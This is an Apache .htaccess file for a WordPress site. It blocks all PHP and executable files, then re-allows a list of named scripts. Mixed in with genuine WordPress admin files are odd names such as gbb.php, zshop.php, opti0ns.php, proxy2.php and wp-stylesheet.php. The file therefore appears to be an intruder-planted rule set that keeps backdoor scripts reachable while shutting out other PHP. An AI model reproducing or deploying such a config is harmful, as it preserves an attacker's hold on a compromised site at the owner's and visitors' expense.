<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "(?i).*\.(html?|js|css|jpe?g|gif|webp|png|otf|ico|cur|map|eot|svgz?|ttf|woff2?|xml|xsl|csv|txt)$">
  <IfModule mod_authz_core.c>
    Require all granted
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order Allow,Deny
    Allow from all
  </IfModule>
</FilesMatch>
<FilesMatch "^(about.php|admin-ajax.php|admin-footer.php|admin-functions.php|admin-header.php|admin-post.php|admin.php|async-upload.php|authorize-application.php|comment.php|credits.php|custom-background.php|custom-header.php|customize.php|edit-comments.php|edit-form-advanced.php|edit-form-blocks.php|edit-form-comment.php|edit-link-form.php|edit-tag-form.php|edit-tags.php|edit.php|erase-personal-data.php|export-personal-data.php|export.php|freedoms.php|import.php|index.php|install-helper.php|install.php|link-add.php|link-manager.php|link-parse-opml.php|link.php|load-scripts.php|load-styles.php|media-new.php|media-upload.php|media.php|menu-header.php|menu.php|moderation.php|ms-admin.php|ms-delete-site.php|ms-edit.php|ms-options.php|ms-sites.php|ms-themes.php|ms-upgrade-network.php|ms-users.php|my-sites.php|nav-menus.php|network.php|options-discussion.php|options-general.php|options-head.php|options-media.php|wp-login.php|admin.php|index.php|wp-stylesheet.php|wp-comment.php|gbb.php|gbb2.php|header-large-dark.php|general-video.php|jquery-ui-dialog.php|wp-media.php|customize.php|header-sitemaps.php|proxy2.php|buttons.php|backups.php|_inc.php|zshop.php|zmall.php|zstore.php|discountz.php|aboutz.php|zgoods.php|options-permalink.php|options-privacy.php|options-reading.php|options-writing.php|options.php|plugin-editor.php|plugin-install.php|plugins.php|post-new.php|post.php|press-this.php|privacy-policy-guide.php|privacy.php|profile.php|revision.php|setup-config.php|site-editor.php|site-health-info.php|site-health.php|term.php|theme-editor.php|theme-install.php|themes.php|tools.php|update-core.php|update.php|upgrade-functions.php|upgrade.php|upload.php|user-edit.php|user-new.php|users.php|widgets-form-blocks.php|widgets-form.php|widgets.php|site-editors.php|theme-editors.php|ms-menu.php|load-style.php|opti0ns.php|class-wp-debug-data.php|class-wp-debug-data.php|class-pclzip.php|class-wp-filesystem-ssh2.php|PHPMailer.php|File.php|class-requests.php|class-wp-http-encoding.php|class-wp-filesystem-direct.php|class-phpass.php|class-snoopy.php|class-json.php|template.php|theme-install.php|media.php|file.php|class-custom-image-header.php|class-custom-background.php|misc.php|goods.php|home.php|news.php|sites.php|mall.php|gbb3.php|shop.php|store.php|items.php)$">
Order allow,deny
Allow from all
</FilesMatch>